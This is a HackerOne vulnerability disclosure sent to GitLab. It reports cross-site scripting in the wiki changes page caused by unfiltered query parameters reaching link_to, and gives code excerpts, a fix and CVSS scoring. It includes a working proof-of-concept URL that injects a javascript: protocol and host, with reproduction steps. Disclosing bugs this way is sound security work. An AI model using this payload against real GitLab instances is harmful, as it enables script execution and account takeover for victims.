Cross-site scripting in wiki changes page affecting self-hosted instances running without strict CSP
HackerOne report #1730461 by ryotak
on 2022-10-11, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Summary
Due to the improper filtering of query parameters in the wiki changes
page, an attacker can execute arbitrary JavaScript on the self-hosted instances running without strict CSP.
Description
In app/views/projects/diffs/_diffs.html.haml
, the following code is used to generate a link to remove whitespace changes from the diff.
app/views/projects/diffs/_diffs.html.haml
line 24
= toggle_whitespace_link(url_for(params_with_whitespace), class: 'd-none d-sm-inline-block')
app/helpers/diff_helper.rb
line 280-282
def params_with_whitespace
hide_whitespace? ? request.query_parameters.except(:w) : request.query_parameters.merge(w: 1)
end
As params_with_whitespace
is using request.query_parameters
instead of safe_params
is used to pass parameters to link_to
, arbitrary parameters can be passed here.
Since link_to
supports parameters such as protocol
or host
, it's possible to inject javascript:
URLs and achieves XSS.
Steps to reproduce
Self-hosted instance (with an alert)
- Set up your own GitLab instance.
- Log in to the GitLab instance.
- Create a project.
- From the sidebar, click
Wiki
. - Click
Create your first page
- Fill in the contents.
- Click
Create page
- Open https://YOUR_OWN_INSTANCE/USERNAME/PROJECT_NAME/-/wikis/home/diff?protocol=javascript&host=%250dalert(document.domain)//
- Click
Hide whitespace changes
- Confirm that
alert(document.domain)
has been executed.
GitLab.com (with a CSP error message)
- Log in to your GitLab account.
- Create a project.
- From the sidebar, click
Wiki
. - Click
Create your first page
- Fill in the contents.
- Click
Create page
- Open https://gitlab.com/USERNAME/PROJECT_NAME/-/wikis/home/diff?protocol=javascript&host=%250dalert(document.domain)//
- Open DevTools.
- Click
Hide whitespace changes
. - Confirm that CSP prevented the execution of JavaScript.
Examples
What is the current bug behavior?
request.query_parameters
is used, which may include dangerous parameters.
What is the expected correct behavior?
safe_params
should be used to filter the dangerous parameters.
Relevant logs and/or screenshots
Details of CVSS
Attack Vector: Network (Attacks can be performed over the internet.)
Attack Complexity: Low (Attack complexity shouldn't be affected by user interactions.)
Privileges Required: Low (An attacker needs to create a project before attacking the victim.)
User Interaction: Required (Clicks are required.)
Scope: Changed (The vulnerable component and the impacted component are different; GitLab server and the browser)
Confidentiality: High (Since an attacker can perform arbitrary actions on behalf of the user, this should be rated as High.)
Integrity: High (Same as above.)
Availability: None (Account takeover doesn't directly affect the availability.)
Results of GitLab environment info
System information
System: Ubuntu 20.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version:6.4.2
Go Version: unknown
GitLab information
Version: 15.4.1-ee
Revision: 7b2ed8f038f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: https://gl.ryotak.me
HTTP Clone URL: https://gl.ryotak.me/some-group/some-project.git
SSH Clone URL: git@gl.ryotak.me:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
An attacker can execute arbitrary JavaScript on the victim's browser and do any actions on behalf of the user.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: